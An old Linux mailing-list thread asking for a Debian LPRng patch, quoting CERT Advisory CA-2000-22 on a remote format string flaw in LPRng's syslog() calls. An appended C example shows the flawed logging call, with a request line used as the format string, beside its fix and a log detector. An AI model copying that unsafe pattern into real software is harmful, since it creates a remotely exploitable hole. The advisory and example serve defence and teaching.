Hey, what do you mean by debian-specific patch?

On Wednesday 10 January 2001 07:44, Ron Rademaker wrote:
> I know there's a debian package of lprng, but I don't know if the patch
> you're talking about is applied to this package, I guess you should check
> the changelog to find out.
>
> Ron Rademaker
>
> On Wed, 10 Jan 2001, V. Achiaga wrote:
> > Does anyone know where I can find a debian-specific patch for the
> > lprng package?
> >
> > Thanks in advance.
> >
> > Why? Just read the following...
> >
> > > Subject: CERT Advisory CA-2000-22
> > >
> > > CERT Advisory CA-2000-22 Input Validation Problems in LPRng
> > >
> > > Original release date: December 12, 2000
> > > Last updated: --
> > > Source: CERT/CC
> > >
> > > A complete revision history is at the end of this file.
> > >
> > > Systems Affected
> > >
> > > * Systems running unpatched LPRng software
> > >
> > > Overview
> > >
> > > A popular replacement software package to the BSD lpd printing
> > > service called LPRng contains at least one software defect, known as a
> > > "format string vulnerability,"[1] which may allow remote users to
> > > execute arbitrary code on vulnerable systems.
> > >
> > > I. Description
> > >
> > > LPRng, now being packaged in several open-source operating system
> > > distributions, has a missing format string argument in at least two
> > > calls to the syslog() function.
> > >
> > > Missing format strings in function calls allow user-supplied
> > > arguments to be passed to a susceptible *snprintf() function call.
> > > Remote users with access to the printer port (port 515/tcp) may be able
> > > to pass format-string parameters that can overwrite arbitrary addresses
> > > in the printing service's address space. Such overwriting can cause
> > > segmentation violations leading to denial of printing services or to
> > > the execution of arbitrary code injected through other means into the
> > > memory segments of the printer service.
> > >
> > > Sample syslog entries from successful exploitation of this
> > > vulnerability have been reported, as follows:
> > >
> > > Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
> > >
> > > This vulnerability has been assigned the identifier CAN-2000-0917 by
> > > the Common Vulnerabilities and Exposures (CVE) group:
> > >
> > > http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917
> > >
> > > The CERT/CC has received reports of extensive probing to port
> > > 515/tcp. In addition, we have received some reports of systems
> > > compromised using this vulnerability. Tools exploiting this
> > > vulnerability have been posted to public forums.
> > >
> > > II. Impact
> > >
> > > A remote user may be able to execute arbitrary code with elevated
> > > privileges.
> > >
> > > In addition, the printing service may be disrupted or disabled
> > > entirely.
> > >
> > > III. Solution
> > >
> > > Apply a patch from your vendor
> > >
> > > Upgrade to a non-vulnerable version of LPRng (3.6.25), as described
> > > in the vendor sections below. Alternately, you can obtain the version
> > > of LPRng which fixes the missing format string at:
> > >
> > > ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz
> > >
> > > Disallow access to printer service ports (typically 515/tcp) using
> > > firewall or packet-filtering technologies
> > >
> > > Blocking access to the vulnerable service will limit your exposure
> > > to attacks from outside your network perimeter. However, the
> > > vulnerability would still allow local users to gain privileges they
> > > normally shouldn't have; in addition, blocking port 515/tcp at a
> > > network perimeter would still allow any remote user inside the
> > > perimeter to exploit the vulnerability.
> > >
> > > Appendix A. Vendor Information
> > >
> > > Apple
> > >
> > > Apple has conducted an investigation and determined that Mac OS X
> > > Public Beta and Mac OS X Server do not use LPRng and are therefore
> > > not vulnerable to this exploitation.
> > >
> > > Caldera OpenLinux
> > >
> > > See CSSA-2000-033.0 "format bug in LPRng" at:
> > >
> > > http://www.calderasystems.com/support/security/advisories/CSSA-2000-033.0.txt
> > >
> > > Compaq Computer Corporation
> > >
> > > Compaq Tru64 UNIX S/W is not vulnerable.
> > >
> > > FreeBSD
> > >
> > > FreeBSD does not include LPRng in the base system. Older versions of
> > > FreeBSD included a vulnerable version of LPRng in the Ports
> > > Collection but this was corrected almost 2 months ago, prior to the
> > > release of FreeBSD 4.2. See FreeBSD Security Advisory 00:56
> > > (ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:56.lprng.asc)
> > > for more information.
> > >
> > > Hewlett-Packard Company
> > >
> > > This does not apply to HP; HP does not ship LPRng on HP-UX.
> > >
> > > IBM
> > >
> > > IBM's AIX operating system is not vulnerable to this security
> > > exploit.
> > >
> > > Microsoft Corporation
> > >
> > > Microsoft doesn't use LPRng in any of its products, so no Microsoft
> > > products are affected by the vulnerability.
> > >
> > > NetBSD
> > >
> > > NetBSD does not include LPRng in the base system; however we do have
> > > a third-party package of LPRng-3.6.8 which is vulnerable. There's work
> > > underway to upgrade it to a non-vulnerable version.
> > >
> > > OpenBSD
> > >
> > > OpenBSD does not ship lprng.
> > >
> > > RedHat
> > >
> > > LPRng Version 3.6.24 and earlier is vulnerable.
> > >
> > > See RHSA-2000:065-04 at:
> > >
> > > http://www.redhat.com/support/errata/RHSA-2000-065-06.html
> > >
> > > SGI
> > >
> > > IRIX does not contain LPRng support.
> > >
> > > SuSE
> > >
> > > SuSE is not vulnerable. Please see additional comments at:
> > >
> > > http://lists.suse.com/archives/suse-security/2000-Sep/0259.html
> > >
> > > References
> > >
> > > 1. VU#382365: LPRng can pass user-supplied input as a format string
> > > parameter to syslog() calls, CERT/CC, 10/06/2000,
> > > https://www.kb.cert.org/vuls/id/382365
> > > _________________________________________________________________
> > >
> > > The CERT Coordination Center thanks Chris Evans for his initial
> > > report on the vulnerability described in this advisory.
> > > _________________________________________________________________
> > >
> > > Author: This document was written by Jeffrey S Havrilla. Feedback on
> > > this advisory is appreciated.
> > >
> > > ______________________________________________________________________
> > >
> > > This document is available from:
> > > http://www.cert.org/advisories/CA-2000-22.html
> > >
> > > ______________________________________________________________________
> > >
> > > CERT/CC Contact Information
> > >
> > > Email: [EMAIL PROTECTED]
> > > Phone: +1 412-268-7090 (24-hour hotline)
> > > Fax: +1 412-268-6989
> > > Postal address:
> > > CERT Coordination Center
> > > Software Engineering Institute
> > > Carnegie Mellon University
> > > Pittsburgh PA 15213-3890
> > > U.S.A.
> > >
> > > CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) /
> > > EDT(GMT-4) Monday through Friday; they are on call for emergencies
> > > during other hours, on U.S. holidays, and on weekends.
> > >
> > > Using encryption
> > >
> > > We strongly urge you to encrypt sensitive information sent by email.
> > > Our public PGP key is available from
> > >
> > > http://www.cert.org/CERT_PGP.key
> > >
> > > If you prefer to use DES, please call the CERT hotline for more
> > > information.
> > >
> > > Getting security information
> > >
> > > CERT publications and other security information are available from
> > > our web site
> > >
> > > http://www.cert.org/
> > >
> > > To subscribe to the CERT mailing list for advisories and bulletins,
> > > send email to [EMAIL PROTECTED] Please include in the body of your
> > > message
> > >
> > > subscribe cert-advisory
> > >
> > > * "CERT" and "CERT Coordination Center" are registered in the U.S.
> > > Patent and Trademark Office.
> > >
> > > ______________________________________________________________________
> > >
> > > NO WARRANTY
> > > Any material furnished by Carnegie Mellon University and the
> > > Software Engineering Institute is furnished on an "as is" basis.
> > > Carnegie Mellon University makes no warranties of any kind, either
> > > expressed or implied as to any matter including, but not limited to,
> > > warranty of fitness for a particular purpose or merchantability,
> > > exclusivity or results obtained from use of the material. Carnegie
> > > Mellon University does not make any warranty of any kind with respect
> > > to freedom from patent, trademark, or copyright infringement.
> > > _________________________________________________________________
> > >
> > > Conditions for use, disclaimers, and sponsorship information
> > >
> > > Copyright 2000 Carnegie Mellon University.
> > >
> > > Revision History
> > > Dec 12, 2000: Initial Release
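The defect the advisory describes, shown as an added C example that is not from this thread or from LPRng itself: a syslog()-style logger (hypothetical log_msg) called with the request line as its format string, beside the constant-format fix, plus a small check (hypothetical has_format_directive) a defender can run over logged lpd request lines. The "%%" in the constructed request is used because vsnprintf interprets it deterministically, unlike the %u and %n directives in the advisory's sample entry.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical syslog()-style logger: its first argument is the vsnprintf format. */
static int log_msg(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int r = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return r;
}

/* The defect: the request line itself is the format, so every %-directive
 * in it is interpreted by vsnprintf instead of being logged verbatim. */
static void log_request_unsafe(char *out, size_t n, const char *request)
{
    log_msg(out, n, request);
}

/* The fix: a constant format string; untrusted data only as an argument. */
static void log_request_safe(char *out, size_t n, const char *request)
{
    log_msg(out, n, "%s", request);
}

/* Detection aid for lpd logs: 1 if a request line holds anything a printf-
 * family function would treat as a directive; "%%" is a literal and skipped. */
static int has_format_directive(const char *s)
{
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') { s++; continue; }
        return 1;
    }
    return 0;
}

int main(void)
{
    char buf[64];   /* constructed request; "%%" interprets deterministically */
    log_request_unsafe(buf, sizeof buf, "print job 50%% done");
    printf("unsafe: %s\n", buf);   /* print job 50% done  */
    log_request_safe(buf, sizeof buf, "print job 50%% done");
    printf("safe:   %s\n", buf);   /* print job 50%% done */
    return 0;
}
```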